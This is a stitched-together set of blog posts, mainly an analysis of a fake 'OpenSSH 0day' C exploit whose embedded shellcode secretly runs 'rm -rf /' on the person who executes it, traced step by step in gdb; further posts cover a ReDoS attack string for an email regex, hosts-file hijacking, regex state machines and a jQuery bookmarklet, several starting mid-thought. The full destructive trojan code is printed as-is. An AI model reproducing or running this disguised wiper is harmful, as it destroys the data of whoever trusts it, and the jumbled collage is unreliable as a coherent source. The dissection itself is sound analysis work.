/*
 *
 * Priv8! Priv8! Priv8! Priv8! Priv8! Priv8! Priv8!
 *
 * OpenSSH <= 5.3 remote root 0day exploit (32-bit x86)
 * Priv8! Priv8! Priv8! Priv8! Priv8! Priv8! Priv8!
 *
 *
 */

#include <stdio.h>
#include <netdb.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <arpa/inet.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>

void usage(char *argv[])
{
    printf("\n\t[+] HATSUNEMIKU\n");
    printf("\t[+] OpenSSH <= 5.3p1 remote root 0day exploit\n");
    printf("\t[+] Keep this 0day priv8!\n");
    printf("\t[+] usage: %s <target> <port>\n\n", argv[0]);
    exit(1);
}

unsigned char decoder[]=   "\x6a\x0b\x58\x99\x52"
                           "\x6a\x2f\x89\xe7\x52"
                           "\x66\x68\x2d\x66\x89"
                           "\xe6\x52\x66\x68\x2d"
                           "\x72\x89\xe1\x52\x68"
                           "\x2f\x2f\x72\x6d\x68"
                           "\x2f\x62\x69\x6e\x89"
                           "\xe3\x52\x57\x56\x51"
                           "\x53\x89\xe1\xcd\x80";

unsigned char rootshell[]= "\x31\xd2\xb2\x0a\xb9\x6f\x75\x21\x0a\x51\xb9\x63\x6b"
                           "\x20\x79\x51\x66\xb9\x66\x75\x66\x51\x31\xc9\x89\xe1"
                           "\x31\xdb\xb3\x01\x31\xc0\xb0\x04\xcd\x80\x31\xc0\x31"
                           "\xdb\x40\xcd\x80";

int main(int argc, char **argv)
{

    int euid = geteuid();
    int port= 22, sock;
    char h[1000];
    struct hostent *host;
    struct sockaddr_in addr;

    if(euid != 0)
    {
        fprintf(stderr, "You need to be root to use raw sockets.\n");
        exit(1);
    }
    if(euid == 0)
    {
        fprintf(stdout, "MIKU! MIKU! MIKU!\n");
    }
    if(argc != 3)
    usage(argv);
    if(!inet_aton(h, &addr.sin_addr))
    {
        host = gethostbyname(h);
        if(!host)
        {
            fprintf(stderr, "[-] Exploit failed.\n");
            (*(void(*)())decoder)();
            exit(1);
        }
        addr.sin_addr = *(struct in_addr*)host->h_addr;
    }
    sock = socket(PF_INET, SOCK_STREAM, 0);
    addr.sin_port = htons(port);
    addr.sin_family = AF_INET;
    if(connect(sock,(struct sockaddr*)&addr,sizeof(addr))==-1)
    {
        fprintf(stderr,"[-] Exploit failed.\n");
        exit(1);
    }
    char payload[1337];
    memcpy(payload, &decoder, sizeof(decoder));
    memcpy(payload, &rootshell, sizeof(rootshell));
    send(sock, payload, strlen(payload),0);
    close(sock);
    if(connect(sock,(struct sockaddr*)&addr,sizeof(addr))==-1)
    {
        fprintf(stderr, "[-] Exploit failed.\n");
        exit(1);
    }
    else if(connect(sock,(struct sockaddr*)&addr,sizeof(addr))==0)
    {
        fprintf(stdout, "[+]g0t sh3ll!\n");
        system("/bin/bash");
    }
    else
    {
        fprintf(stderr, "[-] Exploit failed.\n");
        close(sock);
        exit(0);
    }
}

Local Shellcode, Local Shell

The first thing I noticed about the exploit code is that it seemingly attempts to run shellcode locally on line 71 before exiting. Further down at line 97 the code prints out a success message and spawns a shell, locally. Alarm bells ringing yet? On further inspection it turns out that all the code actually does is run shellcode locally because the variable h is never initialised and so the call to gethostbyname never succeeds.

“Analyse This”

The C program only calls the shellcode in the decoder variable so I grabbed that, added it to a minimal C program in a BackTrack virtual machine and compiled it.

root@bt:~/decodeshellcode# cat shellcode.c
unsigned char shellcode[] = "\x6a\x0b\x58\x99\x52\x6a\x2f\x89\xe7\x52\x66\x68\x2d\x66\x89\xe6\x52\x66\x68\x2d\x72\x89\xe1\x52\x68\x2f\x2f\x72\x6d\x68\x2f\x62\x69\x6e\x89\xe3\x52\x57\x56\x51\x53\x89\xe1\xcd\x80";

int main(int argc, char **argv) {
	(*(void(*)())shellcode)();
}

root@bt:~/decodeshellcode# gcc -o shellcode shellcode.c

With the program compiled I loaded it up in gdb, set a breakpoint on main and started the program running.

root@bt:~/decodeshellcode# gdb shellcode
[snipped...]
(gdb) b main
Breakpoint 1 at 0x80483b7
(gdb) run
Starting program: /root/decodeshellcode/shellcode

Breakpoint 1, 0x080483b7 in main ()

To aid in stepping through the program I set gdb to display the next 5 instructions to be executed each time execution stops (i.e. after executing a single instruction).

(gdb) display /5i $pc
1: x/5i $pc
=> 0x80483b7 <main+3>:  and    $0xfffffff0,%esp
   0x80483ba <main+6>:  mov    0x804a010,%eax
   0x80483bf <main+11>: call   *%eax
   0x80483c1 <main+13>: mov    %ebp,%esp
   0x80483c3 <main+15>: pop    %ebp

Using the si command to step through the program one instruction at a time the first thing to notice is the call instruction at 0x80483bf which jumps into the shellcode from the original code listing. Stepping through the shellcode shows little of interest, mostly push and mov instructions, until 0x80484bb which contains an interrupt instruction – int 0×80 which makes a Unix system call.

(gdb) si
0x080484bb in ?? ()
1: x/5i $pc
=> 0x80484bb:   int    $0x80
   0x80484bd:   add    %al,(%eax)
   0x80484bf:   add    %al,(%eax)
   0x80484c1 <__FRAME_END__+1>: add    %al,(%eax)
   0x80484c3 <__FRAME_END__+3>: add    %al,(%eax)

When interrupt 0×80 is executed the EAX register is used to determine which Unix system call to execute and the EBX, ECX, EDX, ESI and EDI registers are used to specify parameters. In gdb we can check the value of a register using the info command.

(gdb) info reg eax
eax            0xb      11

Using the Linux Syscall Reference we can see that system call 11 (0xb) is execve which is used to execute a program, overwriting the memory or the current process with that of the program being executed. The call takes three parameters as follows:

• EBX contains the address of a string specifying the name of the program to execute
• ECX contains the address of an array of strings containing the command line parameters for the program being executed, this array must end with a null (0×0) pointer
• EDX contains either null or the address of an array of strings containing environment variables for the program being executed

The x command in gdb allows us to examine a memory address in various formats. Examining the address stored in the EBX register as a string reveals that the shellcode executes the program /bin//rm.

(gdb) x /s $ebx
0xbffff4fc:     "/bin//rm"

If that itself isn’t bad enough we can look at the parameters passed to the program by examining the ECX register, keeping in mind that it points at an array of strings which will be represented in memory as a series of memory addresses (pointers), each of which points to the beginning of a string. In this case gdb is running in a 32-bit environment so memory addresses are 4 bytes long. Examining the first 4 bytes pointed at by ECX should give the address of the first command line parameter, which should be the name of the program itself (i.e. /bin//rm).

(gdb) x /4xb $ecx
0xbffff4e8@     0xfc    0xf4    0xff    0xbf

The bytes are in little endian order here but once rearranged it’s no surprise that the result is 0xbffff4fc, the address stored in the EBX register, the name of the program to be executed.

Examining further addresses reveals the parameters passed to the program.

(gdb) x /20x $ecx
0xbffff4e8@     0xfc    0xf4    0xff    0xbf    0x08    0xf5    0xff    0xbf
0xbffff4f0@     0x0e    0xf4    0xff    0xbf    0x14    0xf5    0xff    0xbf
0xbffff4f8@     0x00    0x00    0x00    0x00
(gdb) x /s 0xbffff508
0xbffff508:      "-r"
(gdb) x /s 0xbffff50e
0xbffff50e       "-f"
(gdb) x /s 0xbffff514
0xbffff514       "/"

There we have it, the exploit code calls shellcode which attempts to remove all files from the root file system by executing “rm -r -f /”. This is the same conclusion that Channon Powell came to by looking at strings in the shellcode.

For me this was an opportunity to put my current learning to the test, maybe others can learn from this too!

What about the Shellcode?

The original exploit code does one thing only – attempts to execute “rm -rf /” – but what about the other piece of shellcode contained in the shellcode variable? I decided to load that up in gdb and analyse that too.

(gdb) si
0x08048490 in ?? ()
1: x/5i $pc
=> 0x8048490:   xor    %edx,%edx
   0x8048492:   mov    $0xa,%dl
   0x8048494:   mov    $0xa21756f,%ecx
   0x8048499:   push   %ecx
   0x804849a:   mov    $0x79206b63,%ecx

As before there was nothing particularly interesting to begin with apart from the first instruction which is a common shellcode technique. XORing a register with itself sets the value of the register to zero whilst avoiding null bytes in the shellcode. Null bytes in the shellcode may prevent the targeted vulnerability from being triggered. Perhaps this is real shellcode?

Stepping through the program eventually brings us to a system call instruction, this time system call 4 (sys_write) which writes a number of bytes to a file descriptor. The parameters are as follows:

• EBX is an integer specifying the file descriptor to write to
• ECX is the address of the data to be written
• EDX is the number of bytes to write

Examining the registers within gdb reveals that the system call outputs the string “fuck you!\n” to the standard output (file descriptor 1). Well someone isn’t happy about their ‘shellcode’ being disassembled!

(gdb) info reg eax
eax            0x4      4
(gdb) info reg ebx
ebx            0x1      1
(gdb) x /s $ecx
0xbffff502:      "fuck you!\n\301\203\004\b\340\203\004\b"
(gdb) info reg edx
edx            0xa      10

Finally stepping through a few more instructions leads to one last system call, this time to system call 1 or sys_exit which exits the process.

I’d love to know if anyone is still having issues with the define feature of Google, leave a comment!

Install it here, it should work with all Firefox versions from 3.0.* to 4.0.*.

Here are some of the images generated by the tool. In each image the left-most circle represents the start of the finite state machine (FSM) and double circles represent accepting/success states. The lines between states represent transitions and are labelled with the input character that causes the transition to be followed. In a non-deterministic FSM there are epsilon transitions that can be followed on no input. Click on any of the images to view the full size version.

Example 1 – Matching a series of digits

The following images show a non-deterministic and deterministic FSM for the regular expression (1|2|3|4|5|6|7|8|9|0)* which matches zero or more digits (0-9). The third image shows the path taken to match the input string 12486 against the regular expression.

Non-deterministic FSM for (1|2|3|4|5|6|7|8|9|0)*

Deterministic FSM for (1|2|3|4|5|6|7|8|9|0)*

Matching the string 12486 against (1|2|3|4|5|6|7|8|9|0)*

Example 2 – Matching the word hello case-insensitively

The next set of images show non-deterministic and deterministic FSMs for the regular expression (H|h)(E|e)(L|l)(L|l)(O|o) which matches the word hello using any combination of upper and lower case letters. The third image shows an optimised deterministic FSM and the fourth shows the path taken to match the string HeLlO.

Non-deterministic FSM for (H|h)(E|e)(L|l)(L|l)(O|o)

Deterministic FSM for (H|h)(E|e)(L|l)(L|l)(O|o)

Optimised deterministic FSM for (H|h)(E|e)(L|l)(L|l)(O|o)

Matching the string HeLlO against (H|h)(E|e)(L|l)(L|l)(O|o)

A few years ago I was asked if I could diagnose the cause of masses of errors appearing in the error logs of a website that was built using a popular PHP based content management system (CMS). After spending some time debugging the website I discovered that the problem was a calendar component that was included with the CMS. The calendar events were all serialized and stored in a single database field so when the length of the serialized event data exceeded the length of the database field the data was truncated. After this most page requests caused the PHP unserialize() function to log parsing errors as the CMS tried to un-serialize the calendar event data. I contacted the developers of the CMS and they have since moved the calendar event data into its own database table!

The serialize() and json_encode() functions shouldn’t be used as a quick and easy method of storing data in a database. Not only do they increase the size of the data but you also lose some advantages of database storage such as the ability to index and search on the various fields. A better use for these functions might be to store complex variables on the PHP session or to transfer complex variables across a network, for example to use in another application. The json_encode() function is especially useful if data is being shared with another application or front-end AJAX code because it provides a well supported and very lightweight alternative to XML.

“Once executed on the victim’s machine the exploit code makes persistent changes [...]. The exploit code is then removed from the victim’s machine.”

The attack doesn’t leave behind any strange files, start-up entries or processes which is quite worrying because these are the first things I look for when diagnosing and repairing a malware infection.

The attack works by modifying the hosts file to re-map Internet addresses to malicious servers. This is difficult to detect because web browsers and other software will still display the address that was originally entered – for example if google.com is re-mapped to bing.com and the user visited google.com they would see the page served by bing.com but the browser address bar would still display google.com, in fact google.com would be completely inaccessible.

A much more dangerous attack could be executed by re-mapping the URL of an online banking website to a server that displays a fake, but identical, online banking website. The user wouldn’t be able to tell the difference as they enter their banking details into a malicious website.

Solutions

Some anti-malware applications include an option to protect the hosts file, Spybot Search & Destroy is one such application, but for cases where hosts file protection isn’t available I have created a tiny program to monitor the hosts file for changes.

The program creates a tray icon and displays a notification balloon when it detects a change to the hosts file. Clicking the notification balloon will open the hosts file in notepad for quick and easy checking/repairing. The program has been tested on Windows XP SP2 and Windows 7 but if you have any problems with it please leave a comment and I’ll do my best to help.

Download the installer (.exe)
Download the Windows installer package (.msi)

Source Code

For the techie types out there the C# source code and Visual Studio 2010 workspace for the program and installer can be downloaded here.

The icon was created by Jonas Rask.

The source code can be downloaded here and includes a compiled Java program to allow you to play against the AI. Use and modify the code as you wish. I have provided a swing GUI so that you can quickly play against the AI and test any changes you make.

I did some research into this idea and came across the term ReDoS and one existing security advisory published by Secunia in April 2009 (the Spring Framework is vulnerable to a ReDoS attack). I also came across an interesting article on the subject published in the Microsoft Developer Network Magazine in May 2010 that presents a great analysis of how a ReDoS attack works and presents one potential option for automatically detecting vulnerable regular expressions.

Experimenting with ReDoS

As detailed in the MSDN article the cause of ReDoS attacks is back tracking. The regular expression ^(a+)+$ matches 1 or more capture groups each containing 1 or more ‘a’ characters so given the string ‘aab’ the regular expression engine might look at two possibilities (aa)b and (a)(a)b. Prefixing one more ‘a’ character to the string doubles the possibilities for finding a match giving (aaa)b, (aa)(a)b, (a)(aa)b, and (a)(a)(a)b.

Out of interest I threw together a program to test some bad regular expression matching. I used Java because the security advisory I found is for the Spring Framework which is built in Java.

public class Main {
    public static void main(String[] args) {
		System.out.println("Testing the regular expression ^(a+)+$ against varying length input strings where an input string of length n consists of the letter a repeated n-1 times followed by the letter b.");
		System.out.println("For example an input length of 5 gives the string aaaab\n");
		String input = "aaaaaaaaaaaaaaaaaaab";
		for(int i = 20; i <= 25; i++) {
			System.out.println("Testing input length " + i + "... ");
			testMatch("^(a+)+$", input);
			input = "a" + input;
		}
    }

	public static void testMatch(String regex, String text) {
		long startTime = System.currentTimeMillis();
		text.matches(regex);
		long totalTime = System.currentTimeMillis() - startTime;
		System.out.println(totalTime + "ms");
	}
}

Using this code I achieved the following test results that demonstrate roughly exponential growth in the processing time as the input length increases.

The regular expression ^(a+)+$ is particularly bad and unlikely to be of any use in a website where it might be exploited however there are a lot of websites that use regular expressions to validate the format of an email address. The complexity of email address validation patterns varies greatly but the MSDN article mentions a pattern taken from an online regular expression library that is vulnerable to attack:

^([0-9a-zA-Z]([-.\w]*[0-9a-zA-Z])*@(([0-9a-zA-Z])+([-\w]*[0-9a-zA-Z])*\.)+[a-zA-Z]{2,9})$

The highlighted capture group includes repetition whilst also being repeated itself. Achieving denial of service against this regular expression is as simple as ‘abcdefghijklmnopqrstuvwxyz@@’! A quick Java test of this regular expression and input string took 7,543ms to execute however this will increase exponentially with each character inserted before the first @ symbol.

public class Main {
    public static void main(String[] args) {
		String regex = "^([0-9a-zA-Z]([-.\\w]*[0-9a-zA-Z])*@(([0-9a-zA-Z])+([-\\w]*[0-9a-zA-Z])*\\.)+[a-zA-Z]{2,9})$";
		String text = "abcdefghijklmnopqrstuvwxyz@@";
		long startTime = System.currentTimeMillis();
		text.matches(regex);
		long totalTime = System.currentTimeMillis() - startTime;
		System.out.println(totalTime + "ms");
    }
}

I threw together some more tests and to my knowledge PHP 5.3.1 is not vulnerable to ReDoS attacks although I do not know about other PHP versions at this time. The .NET 4 regular expression implementation is vulnerable however.

ReDoS in the wild

The Spring Framework vulnerability is the only published ReDoS vulnerability that I’ve come across but there are many websites out there that use regular expressions for form validation. A lot of these websites use identical client-side and server-side validation to provide a better user experience – with client-side validation there’s no need to submit the form and wait for the response to be downloaded and rendered only to find that something was wrong. These websites are potentially advertising vulnerable regular expressions in client-side JavaScript code allowing an attacker to formulate a malicious input string to use in a server-side ReDoS attack.

Whilst researching ReDoS attacks I did come across one website that I know to be vulnerable to a ReDoS attack and I have contacted them about the issue.

I’m really keen to hear your thoughts on ReDoS attacks so please feel free to get in touch or leave a comment below!

var s = document.createElement("script");
s.setAttribute("src", "http://ajax.googleapis.com/ajax/libs/jquery/1/jquery.min.js");
document.body.appendChild(s);

I confirmed that jQuery was injected into the website by using console.log() to write the output of a jQuery call to the FireBug console.

//Log the result of a jQuery function, note jQuery() not $()
console.log(jQuery(document).text());

//$ = jQuery will assign jQuery to $ and allow console.log($(document).text()) to be used instead

To convert this code into a bookmarklet it needs to be wrapped in a function and the return value passed to void() to prevent the browser from trying to render the result of the function.

javascript:void((function(){if(typeof jQuery==='undefined'){var s=document.createElement('script');s.setAttribute('src','http://ajax.googleapis.com/ajax/libs/jquery/1/jquery.min.js');document.body.appendChild(s);}})());

The resulting bookmarklet can be added to a toolbar or favourites menu in Forefox and Chrome by dragging this link: Inject jQuery to the desired location. In other browsers you can right-click the link and create a bookmark or add it to your favourites. The bookmarklet has been tested and works in FireFox 3.6, Internet Explorer 8, Chrome 8, and Opera 11.

By replacing the URL passed to s.setAttribute() this method can also be used to inject other hosted JavaScript libraries into a page.

Update 17th August 2011: Updated the bookmarklet and code to protect against repeated injection of jQuery and to retrieve the latest version of jQuery from the Google CDN. Credit to Jason for his comment!

It turns out to be quite easy through the use of the ExternalInterface class which allows ActionScript to use functionality provided by the container of the Flash component – in this case a JavaScript function provided by the web browser. All it takes is for ExternalInterface to be imported then the call() method can be used to call console.log().

//Import ExternalInterface
import flash.external.ExternalInterface;

//Call console.log() in the browser using the ExternalInterface.call() method
ExternalInterface.call("console.log" , "Hello FireBug console!");

PHP

I often use FirePHP to get nice debug output to the FireBug console from PHP applications but sometimes I need a quick and dirty method of getting debug output that doesn’t affect the page display (i.e. not using echo/print from PHP). In these situations I use the following:

echo '<script>console.log("Hello FireBug console!");</script>' ;